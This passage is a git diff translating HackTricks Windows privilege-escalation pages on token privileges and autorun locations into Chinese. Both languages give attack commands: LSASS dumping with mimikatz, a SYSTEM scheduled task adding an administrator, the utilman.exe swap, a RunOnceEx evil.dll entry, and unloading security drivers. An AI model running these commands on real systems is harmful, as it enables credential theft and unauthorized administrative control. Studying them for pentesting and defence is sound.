-SeCreateTokenPrivilege is a powerful permission, especially useful when a user possesses the ability to impersonate tokens, but also in the absence of SeImpersonatePrivilege. This capability hinges on the ability to impersonate a token that represents the same user and whose integrity level does not exceed that of the current process.
+SeCreateTokenPrivilege是一个强大的权限，特别是在用户拥有impersonate令牌的能力时，但在没有SeImpersonatePrivilege的情况下也很有用。此能力依赖于能够impersonate一个代表同一用户的令牌，并且其完整性级别不超过当前进程的完整性级别。
 
-**Key Points:**
+**关键点：**
 
-- **Impersonation without SeImpersonatePrivilege:** It's possible to leverage SeCreateTokenPrivilege for EoP by impersonating tokens under specific conditions.
-- **Conditions for Token Impersonation:** Successful impersonation requires the target token to belong to the same user and have an integrity level that is less or equal to the integrity level of the process attempting impersonation.
-- **Creation and Modification of Impersonation Tokens:** Users can create an impersonation token and enhance it by adding a privileged group's SID (Security Identifier).
+- **在没有SeImpersonatePrivilege的情况下进行impersonation：** 可以在特定条件下利用SeCreateTokenPrivilege进行EoP，通过impersonate令牌。
+- **令牌impersonation的条件：** 成功的impersonation要求目标令牌属于同一用户，并且其完整性级别小于或等于尝试impersonation的进程的完整性级别。
+- **创建和修改impersonation令牌：** 用户可以创建一个impersonation令牌，并通过添加特权组的SID（安全标识符）来增强它。
 
 ### SeLoadDriverPrivilege
 
-This privilege allows to **load and unload device drivers** with the creation of a registry entry with specific values for `ImagePath` and `Type`. Since direct write access to `HKLM` (HKEY_LOCAL_MACHINE) is restricted, `HKCU` (HKEY_CURRENT_USER) must be utilized instead. However, to make `HKCU` recognizable to the kernel for driver configuration, a specific path must be followed.
+此特权允许**加载和卸载设备驱动程序**，通过创建具有特定值的注册表项`ImagePath`和`Type`。由于对`HKLM`（HKEY_LOCAL_MACHINE）的直接写访问受到限制，因此必须使用`HKCU`（HKEY_CURRENT_USER）。但是，为了使`HKCU`对内核可识别以进行驱动程序配置，必须遵循特定路径。
 
-This path is `\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName`, where `<RID>` is the Relative Identifier of the current user. Inside `HKCU`, this entire path must be created, and two values need to be set:
+此路径为`\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName`，其中`<RID>`是当前用户的相对标识符。在`HKCU`中，必须创建整个路径，并设置两个值：
 
-- `ImagePath`, which is the path to the binary to be executed
-- `Type`, with a value of `SERVICE_KERNEL_DRIVER` (`0x00000001`).
+- `ImagePath`，即要执行的二进制文件的路径
+- `Type`，值为`SERVICE_KERNEL_DRIVER`（`0x00000001`）。
 
-**Steps to Follow:**
-
-1. Access `HKCU` instead of `HKLM` due to restricted write access.
-2. Create the path `\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName` within `HKCU`, where `<RID>` represents the current user's Relative Identifier.
-3. Set the `ImagePath` to the binary's execution path.
-4. Assign the `Type` as `SERVICE_KERNEL_DRIVER` (`0x00000001`).
+**遵循的步骤：**
 
+1. 由于写访问受限，访问`HKCU`而不是`HKLM`。
+2. 在`HKCU`中创建路径`\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName`，其中`<RID>`表示当前用户的相对标识符。
+3. 将`ImagePath`设置为二进制文件的执行路径。
+4. 将`Type`分配为`SERVICE_KERNEL_DRIVER`（`0x00000001`）。
 ```python
 # Example Python code to set the registry values
 import winreg as reg
@@ -89,13 +88,11 @@ reg.SetValueEx(key, "ImagePath", 0, reg.REG_SZ, "path_to_binary")
 reg.SetValueEx(key, "Type", 0, reg.REG_DWORD, 0x00000001)
 reg.CloseKey(key)
 ```
-
-More ways to abuse this privilege in [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges#seloaddriverprivilege](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges#seloaddriverprivilege)
+更多滥用此权限的方法请参见 [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges#seloaddriverprivilege](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges#seloaddriverprivilege)
 
 ### SeTakeOwnershipPrivilege
 
-This is similar to to **SeRestorePrivilege**. Its primary function allows a process to **assume ownership of an object**, circumventing the requirement for explicit discretionary access through the provision of WRITE_OWNER access rights. The process involves first securing ownership of the intended registry key for writing purposes, then altering the DACL to enable write operations.
-
+这与 **SeRestorePrivilege** 类似。其主要功能允许一个进程 **假定对象的所有权**，绕过通过提供 WRITE_OWNER 访问权限的明确自由裁量访问要求。该过程首先确保获得所需注册表项的所有权以进行写入，然后更改 DACL 以启用写入操作。
 ```bash
 takeown /f 'C:\some\file.txt' #Now the file is owned by you
 icacls 'C:\some\file.txt' /grant <your_username>:F #Now you have full access
@@ -111,75 +108,65 @@ icacls 'C:\some\file.txt' /grant <your_username>:F #Now you have full access
 %WINDIR%\system32\config\default.sav
 c:\inetpub\wwwwroot\web.config
 ```
-
 ### SeDebugPrivilege
 
-This privilege permits the **debug other processes**, including to read and write in the memore. Various strategies for memory injection, capable of evading most antivirus and host intrusion prevention solutions, can be employed with this privilege.
+此权限允许**调试其他进程**，包括读取和写入内存。可以使用此权限采用各种内存注入策略，能够规避大多数杀毒软件和主机入侵防御解决方案。
 
 #### Dump memory
 
-You could use [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) from the [SysInternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) to **capture the memory of a process**. Specifically, this can apply to the **Local Security Authority Subsystem Service (**[**LSASS**](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service)**)** process, which is responsible for storing user credentials once a user has successfully logged into a system.
-
-You can then load this dump in mimikatz to obtain passwords:
+您可以使用 [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) 来自 [SysInternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) **捕获进程的内存**。具体来说，这可以应用于**本地安全授权子系统服务（**[**LSASS**](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service)**）**进程，该进程负责在用户成功登录系统后存储用户凭据。
 
+然后，您可以在 mimikatz 中加载此转储以获取密码：
 ```
 mimikatz.exe
 mimikatz # log
 mimikatz # sekurlsa::minidump lsass.dmp
 mimikatz # sekurlsa::logonpasswords
 ```
-
 #### RCE
 
-If you want to get a `NT SYSTEM` shell you could use:
+如果你想获得一个 `NT SYSTEM` shell，你可以使用：
 
 - [**SeDebugPrivilege-Exploit (C++)**](https://github.com/bruno-1337/SeDebugPrivilege-Exploit)
 - [**SeDebugPrivilegePoC (C#)**](https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeDebugPrivilegePoC)
 - [**psgetsys.ps1 (Powershell Script)**](https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1)
-
 ```powershell
 # Get the PID of a process running as NT SYSTEM
 import-module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>)
 ```
-
-## Check privileges
-
+## 检查权限
 ```
 whoami /priv
 ```
+**显示为禁用的令牌**可以被启用，您实际上可以利用_启用_和_禁用_令牌。
 
-The **tokens that appear as Disabled** can be enable, you you actually can abuse _Enabled_ and _Disabled_ tokens.
-
-### Enable All the tokens
-
-If you have tokens disables, you can use the script [**EnableAllTokenPrivs.ps1**](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1) to enable all the tokens:
+### 启用所有令牌
 
+如果您有禁用的令牌，您可以使用脚本 [**EnableAllTokenPrivs.ps1**](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1) 来启用所有令牌：
 ```powershell
 .\EnableAllTokenPrivs.ps1
 whoami /priv
 ```
+或嵌入在这个[**帖子**](https://www.leeholmes.com/adjusting-token-privileges-in-powershell/)中的**脚本**。
 
-Or the **script** embed in this [**post**](https://www.leeholmes.com/adjusting-token-privileges-in-powershell/).
+## 表格
 
-## Table
+完整的令牌权限备忘单在[https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin)，下面的摘要将仅列出直接利用该权限以获得管理员会话或读取敏感文件的方法。
 
-Full token privileges cheatsheet at [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin), summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files.
+| 权限                      | 影响        | 工具                    | 执行路径                                                                                                                                                                                                                                                                                                                                     | 备注                                                                                                                                                                                                                                                                                                                        |
+| ------------------------ | ----------- | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
+| **`SeAssignPrimaryToken`** | _**管理员**_ | 第三方工具              | _"这将允许用户模拟令牌并使用诸如potato.exe、rottenpotato.exe和juicypotato.exe等工具提升到nt系统"_                                                                                                                                                                                                      | 感谢[Aurélien Chalot](https://twitter.com/Defte_)的更新。我会尽快尝试将其重新表述为更像食谱的内容。                                                                                                                                                                                         |
+| **`SeBackup`**           | **威胁**    | _**内置命令**_         | 使用`robocopy /b`读取敏感文件                                                                                                                                                                                                                                                                                                             | <p>- 如果您可以读取%WINDIR%\MEMORY.DMP，可能会更有趣<br><br>- <code>SeBackupPrivilege</code>（和robocopy）在处理打开的文件时没有帮助。<br><br>- Robocopy需要同时具有SeBackup和SeRestore才能使用/b参数。</p>                                                                      |
+| **`SeCreateToken`**      | _**管理员**_ | 第三方工具              | 使用`NtCreateToken`创建任意令牌，包括本地管理员权限。                                                                                                                                                                                                                                                                          |                                                                                                                                                                                                                                                                                                                                |
+| **`SeDebug`**            | _**管理员**_ | **PowerShell**          | 复制`lsass.exe`令牌。                                                                                                                                                                                                                                                                                                                   | 脚本可以在[FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1)找到                                                                                                                                                                                                         |
+| **`SeLoadDriver`**       | _**管理员**_ | 第三方工具              | <p>1. 加载有缺陷的内核驱动程序，如<code>szkg64.sys</code><br>2. 利用驱动程序漏洞<br><br>或者，该权限可用于卸载与安全相关的驱动程序，使用<code>ftlMC</code>内置命令。即：<code>fltMC sysmondrv</code></p>                                                                           | <p>1. <code>szkg64</code>漏洞被列为<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732">CVE-2018-15732</a><br>2. <code>szkg64</code> <a href="https://www.greyhathacker.net/?p=1025">利用代码</a>是由<a href="https://twitter.com/parvezghh">Parvez Anwar</a>创建的</p> |
+| **`SeRestore`**          | _**管理员**_ | **PowerShell**          | <p>1. 启动具有SeRestore权限的PowerShell/ISE。<br>2. 使用<a href="https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1">Enable-SeRestorePrivilege</a>启用该权限。<br>3. 将utilman.exe重命名为utilman.old<br>4. 将cmd.exe重命名为utilman.exe<br>5. 锁定控制台并按Win+U</p> | <p>攻击可能会被某些AV软件检测到。</p><p>替代方法依赖于使用相同权限替换存储在“Program Files”中的服务二进制文件</p>                                                                                                                                                            |
+| **`SeTakeOwnership`**    | _**管理员**_ | _**内置命令**_         | <p>1. <code>takeown.exe /f "%windir%\system32"</code><br>2. <code>icalcs.exe "%windir%\system32" /grant "%username%":F</code><br>3. 将cmd.exe重命名为utilman.exe<br>4. 锁定控制台并按Win+U</p>                                                                                                                                       | <p>攻击可能会被某些AV软件检测到。</p><p>替代方法依赖于使用相同权限替换存储在“Program Files”中的服务二进制文件。</p>                                                                                                                                                           |
+| **`SeTcb`**              | _**管理员**_ | 第三方工具              | <p>操纵令牌以包含本地管理员权限。可能需要SeImpersonate。</p><p>待确认。</p>                                                                                                                                                                                                                                     |                                                                                                                                                                                                                                                                                                                                |
 
-| Privilege                  | Impact      | Tool                    | Execution path                                                                                                                                                                                                                                                                                                                                     | Remarks                                                                                                                                                                                                                                                                                                                        |
-| -------------------------- | ----------- | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
-| **`SeAssignPrimaryToken`** | _**Admin**_ | 3rd party tool          | _"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"_                                                                                                                                                                                                      | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon.                                                                                                                                                                                         |
-| **`SeBackup`**             | **Threat**  | _**Built-in commands**_ | Read sensitve files with `robocopy /b`                                                                                                                                                                                                                                                                                                             | <p>- May be more interesting if you can read %WINDIR%\MEMORY.DMP<br><br>- <code>SeBackupPrivilege</code> (and robocopy) is not helpful when it comes to open files.<br><br>- Robocopy requires both SeBackup and SeRestore to work with /b parameter.</p>                                                                      |
-| **`SeCreateToken`**        | _**Admin**_ | 3rd party tool          | Create arbitrary token including local admin rights with `NtCreateToken`.                                                                                                                                                                                                                                                                          |                                                                                                                                                                                                                                                                                                                                |
-| **`SeDebug`**              | _**Admin**_ | **PowerShell**          | Duplicate the `lsass.exe` token.                                                                                                                                                                                                                                                                                                                   | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1)                                                                                                                                                                                                         |
-| **`SeLoadDriver`**         | _**Admin**_ | 3rd party tool          | <p>1. Load buggy kernel driver such as <code>szkg64.sys</code><br>2. Exploit the driver vulnerability<br><br>Alternatively, the privilege may be used to unload security-related drivers with <code>ftlMC</code> builtin command. i.e.: <code>fltMC sysmondrv</code></p>                                                                           | <p>1. The <code>szkg64</code> vulnerability is listed as <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732">CVE-2018-15732</a><br>2. The <code>szkg64</code> <a href="https://www.greyhathacker.net/?p=1025">exploit code</a> was created by <a href="https://twitter.com/parvezghh">Parvez Anwar</a></p> |
-| **`SeRestore`**            | _**Admin**_ | **PowerShell**          | <p>1. Launch PowerShell/ISE with the SeRestore privilege present.<br>2. Enable the privilege with <a href="https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1">Enable-SeRestorePrivilege</a>).<br>3. Rename utilman.exe to utilman.old<br>4. Rename cmd.exe to utilman.exe<br>5. Lock the console and press Win+U</p> | <p>Attack may be detected by some AV software.</p><p>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege</p>                                                                                                                                                            |
-| **`SeTakeOwnership`**      | _**Admin**_ | _**Built-in commands**_ | <p>1. <code>takeown.exe /f "%windir%\system32"</code><br>2. <code>icalcs.exe "%windir%\system32" /grant "%username%":F</code><br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U</p>                                                                                                                                       | <p>Attack may be detected by some AV software.</p><p>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.</p>                                                                                                                                                           |
-| **`SeTcb`**                | _**Admin**_ | 3rd party tool          | <p>Manipulate tokens to have local admin rights included. May require SeImpersonate.</p><p>To be verified.</p>                                                                                                                                                                                                                                     |                                                                                                                                                                                                                                                                                                                                |
+## 参考
 
-## Reference
-
-- Take a look to this table defining Windows tokens: [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin)
-- Take a look to [**this paper**](https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt) about privesc with tokens.
+- 查看定义Windows令牌的此表：[https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin)
+- 查看关于使用令牌进行权限提升的[**这篇论文**](https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt)。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
index 40a10125e..32ede51bb 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
@@ -1,26 +1,23 @@
-# Privilege Escalation with Autoruns
+# 利用 Autoruns 提权
 
 {{#include ../../banners/hacktricks-training.md}}
 
 <figure><img src="../../images/i3.png" alt=""><figcaption></figcaption></figure>
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**漏洞赏金提示**：**注册** **Intigriti**，一个由黑客为黑客创建的高级**漏洞赏金平台**！今天就加入我们，访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达 **$100,000** 的赏金！
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
 ## WMIC
 
-**Wmic** can be used to run programs on **startup**. See which binaries are programmed to run is startup with:
-
+**Wmic** 可用于在 **启动** 时运行程序。查看哪些二进制文件被编程为在启动时运行：
 ```bash
 wmic startup get caption,command 2>nul & ^
 Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
 ```
+## 定时任务
 
-## Scheduled Tasks
-
-**Tasks** can be schedules to run with **certain frequency**. See which binaries are scheduled to run with:
-
+**任务**可以按**特定频率**安排运行。查看哪些二进制文件被安排运行：
 ```bash
 schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
 schtasks /query /fo LIST 2>nul | findstr TaskName
@@ -31,11 +28,9 @@ Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,Tas
 #You can also write that content on a bat file that is being executed by a scheduled task
 schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgroup administrators user /add"
 ```
+## 文件夹
 
-## Folders
-
-All the binaries located in the **Startup folders are going to be executed on startup**. The common startup folders are the ones listed a continuation, but the startup folder is indicated in the registry. [Read this to learn where.](privilege-escalation-with-autorun-binaries.md#startup-path)
-
+所有位于 **启动文件夹中的二进制文件将在启动时执行**。常见的启动文件夹如下所列，但启动文件夹在注册表中指示。[阅读此内容以了解位置。](privilege-escalation-with-autorun-binaries.md#startup-path)
 ```bash
 dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
 dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
@@ -44,15 +39,14 @@ dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
 Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
 Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
 ```
-
-## Registry
+## 注册表
 
 > [!NOTE]
-> [Note from here](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): The **Wow6432Node** registry entry indicates that you are running a 64-bit Windows version. The operating system uses this key to display a separate view of HKEY_LOCAL_MACHINE\SOFTWARE for 32-bit applications that run on 64-bit Windows versions.
+> [来自这里的说明](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): **Wow6432Node** 注册表项表示您正在运行 64 位 Windows 版本。操作系统使用此键为在 64 位 Windows 版本上运行的 32 位应用程序显示 HKEY_LOCAL_MACHINE\SOFTWARE 的单独视图。
 
-### Runs
+### 运行
 
-**Commonly known** AutoRun registry:
+**常见的** AutoRun 注册表：
 
 - `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
 - `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
@@ -66,9 +60,9 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
 - `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Runonce`
 - `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx`
 
-Registry keys known as **Run** and **RunOnce** are designed to automatically execute programs every time a user logs into the system. The command line assigned as a key's data value is limited to 260 characters or less.
+被称为 **Run** 和 **RunOnce** 的注册表键旨在每次用户登录系统时自动执行程序。分配给键的数据值的命令行限制为 260 个字符或更少。
 
-**Service runs** (can control automatic startup of services during boot):
+**服务运行**（可以控制启动时服务的自动启动）：
 
 - `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
 - `HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
@@ -84,18 +78,15 @@ Registry keys known as **Run** and **RunOnce** are designed to automatically exe
 - `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx`
 - `HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx`
 
-On Windows Vista and later versions, the **Run** and **RunOnce** registry keys are not automatically generated. Entries in these keys can either directly start programs or specify them as dependencies. For instance, to load a DLL file at logon, one could use the **RunOnceEx** registry key along with a "Depend" key. This is demonstrated by adding a registry entry to execute "C:\temp\evil.dll" during the system start-up:
-
+在 Windows Vista 及更高版本中，**Run** 和 **RunOnce** 注册表键不会自动生成。这些键中的条目可以直接启动程序或将其指定为依赖项。例如，要在登录时加载 DLL 文件，可以使用 **RunOnceEx** 注册表键以及一个 "Depend" 键。这通过添加一个注册表项来演示，在系统启动期间执行 "C:\temp\evil.dll"：
 ```
 reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"
 ```
+> [!NOTE]
+> **Exploit 1**: 如果您可以在 **HKLM** 中的任何提到的注册表项内写入，则当其他用户登录时，您可以提升权限。
 
 > [!NOTE]
-> **Exploit 1**: If you can write inside any of the mentioned registry inside **HKLM** you can escalate privileges when a different user logs in.
-
-> [!NOTE]
-> **Exploit 2**: If you can overwrite any of the binaries indicated on any of the registry inside **HKLM** you can modify that binary with a backdoor when a different user logs in and escalate privileges.
-
+> **Exploit 2**: 如果您可以覆盖 **HKLM** 中任何注册表项上指示的任何二进制文件，则当其他用户登录时，您可以用后门修改该二进制文件并提升权限。
 ```bash
 #CMD
 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
@@ -151,19 +142,17 @@ Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\Ru
 Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\RunOnceEx'
 Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
 ```
-
-### Startup Path
+### 启动路径
 
 - `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
 - `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
 - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders`
 - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders`
 
-Shortcuts placed in the **Startup** folder will automatically trigger services or applications to launch during user logon or system reboot. The **Startup** folder's location is defined in the registry for both the **Local Machine** and **Current User** scopes. This means any shortcut added to these specified **Startup** locations will ensure the linked service or program starts up following the logon or reboot process, making it a straightforward method for scheduling programs to run automatically.
+放置在 **启动** 文件夹中的快捷方式将在用户登录或系统重启时自动触发服务或应用程序启动。 **启动** 文件夹的位置在注册表中为 **本地计算机** 和 **当前用户** 范围定义。这意味着添加到这些指定 **启动** 位置的任何快捷方式都将确保链接的服务或程序在登录或重启过程后启动，从而成为自动调度程序运行的简单方法。
 
 > [!NOTE]
-> If you can overwrite any \[User] Shell Folder under **HKLM**, you will e able to point it to a folder controlled by you and place a backdoor that will be executed anytime a user logs in the system escalating privileges.
-
+> 如果您可以覆盖 **HKLM** 下的任何 \[User] Shell Folder，您将能够将其指向由您控制的文件夹，并放置一个后门，该后门将在用户登录系统时执行，从而提升权限。
 ```bash
 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
@@ -175,167 +164,148 @@ Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
 ```
-
 ### Winlogon Keys
 
 `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`
 
-Typically, the **Userinit** key is set to **userinit.exe**. However, if this key is modified, the specified executable will also be launched by **Winlogon** upon user logon. Similarly, the **Shell** key is intended to point to **explorer.exe**, which is the default shell for Windows.
-
+通常，**Userinit** 键设置为 **userinit.exe**。然而，如果此键被修改，指定的可执行文件将在用户登录时由 **Winlogon** 启动。同样，**Shell** 键旨在指向 **explorer.exe**，这是 Windows 的默认外壳。
 ```bash
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
 ```
-
 > [!NOTE]
-> If you can overwrite the registry value or the binary you will be able to escalate privileges.
+> 如果您可以覆盖注册表值或二进制文件，您将能够提升权限。
 
-### Policy Settings
+### 策略设置
 
 - `HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`
 - `HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`
 
-Check **Run** key.
-
+检查 **Run** 键。
 ```bash
 reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
 Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
 Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
 ```
-
 ### AlternateShell
 
-### Changing the Safe Mode Command Prompt
+### 更改安全模式命令提示符
 
-In the Windows Registry under `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot`, there's a **`AlternateShell`** value set by default to `cmd.exe`. This means when you choose "Safe Mode with Command Prompt" during startup (by pressing F8), `cmd.exe` is used. But, it's possible to set up your computer to automatically start in this mode without needing to press F8 and manually select it.
+在 Windows 注册表的 `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot` 下，默认设置有一个 **`AlternateShell`** 值为 `cmd.exe`。这意味着当你在启动时选择“带命令提示符的安全模式”（通过按 F8），将使用 `cmd.exe`。但是，可以设置计算机在不需要按 F8 和手动选择的情况下自动以此模式启动。
 
-Steps to create a boot option for automatically starting in "Safe Mode with Command Prompt":
+创建自动在“带命令提示符的安全模式”中启动的启动选项的步骤：
 
-1. Change attributes of the `boot.ini` file to remove read-only, system, and hidden flags: `attrib c:\boot.ini -r -s -h`
-2. Open `boot.ini` for editing.
-3. Insert a line like: `multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)`
-4. Save changes to `boot.ini`.
-5. Reapply the original file attributes: `attrib c:\boot.ini +r +s +h`
+1. 更改 `boot.ini` 文件的属性以移除只读、系统和隐藏标志：`attrib c:\boot.ini -r -s -h`
+2. 打开 `boot.ini` 进行编辑。
+3. 插入一行，如：`multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL)`
+4. 保存对 `boot.ini` 的更改。
+5. 重新应用原始文件属性：`attrib c:\boot.ini +r +s +h`
 
-- **Exploit 1:** Changing the **AlternateShell** registry key allows for custom command shell setup, potentially for unauthorized access.
-- **Exploit 2 (PATH Write Permissions):** Having write permissions to any part of the system **PATH** variable, especially before `C:\Windows\system32`, lets you execute a custom `cmd.exe`, which could be a backdoor if the system is started in Safe Mode.
-- **Exploit 3 (PATH and boot.ini Write Permissions):** Writing access to `boot.ini` enables automatic Safe Mode startup, facilitating unauthorized access on the next reboot.
-
-To check the current **AlternateShell** setting, use these commands:
+- **Exploit 1:** 更改 **AlternateShell** 注册表项允许自定义命令 shell 设置，可能用于未经授权的访问。
+- **Exploit 2 (PATH 写权限):** 对系统 **PATH** 变量的任何部分具有写权限，特别是在 `C:\Windows\system32` 之前，允许你执行自定义的 `cmd.exe`，如果系统在安全模式下启动，这可能是一个后门。
+- **Exploit 3 (PATH 和 boot.ini 写权限):** 对 `boot.ini` 的写访问使得自动安全模式启动成为可能，从而在下次重启时促进未经授权的访问。
 
+要检查当前的 **AlternateShell** 设置，请使用以下命令：
 ```bash
 reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /v AlternateShell
 Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot' -Name 'AlternateShell'
 ```
+### 已安装组件
 
-### Installed Component
